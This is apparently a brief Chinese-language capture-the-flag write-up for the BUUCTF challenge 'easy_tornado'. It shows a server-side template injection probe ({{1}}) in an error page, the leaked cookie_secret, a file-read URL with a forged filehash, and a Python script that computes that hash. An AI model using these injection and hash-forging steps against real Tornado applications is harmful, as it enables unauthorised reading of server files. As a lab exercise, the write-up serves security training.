CTF-BUUCTF-Web-[护网杯 2018]easy_tornado

CTF-BUUCTF-Web-[护网杯 2018]easy_tornado

看题：

解题：

1、flag --> 在文件 fllllllllllllag中

2、render()函数渲染 --> 用到SSTI

尝试输入/error?msg={ {1}}，确实是存在模板注入

render（）

SSTI

3、cookie_secret
什么是tornado？

cookie_secret在哪？

4、解题

cookie_secret --> ‘43998eab-5931-4776-9249-7827c85788e2’

filename --> /fllllllllllllag

payload --> file?filename=/fllllllllllllag&filehash=0cd840b7bb1ba8f2ec7342eb5fab94b8

md5:

# -*- coding: UTF-8 -*-
import hashlib

def md5(s):
 md5 = hashlib.md5() 
 md5.update(s) 
 return md5.hexdigest()
 
def filehash():
 filename = '/fllllllllllllag'
 cookie_secret = '43998eab-5931-4776-9249-7827c85788e2'
 print(md5(cookie_secret+md5(filename)))
 
if __name__ == '__main__':
 filehash()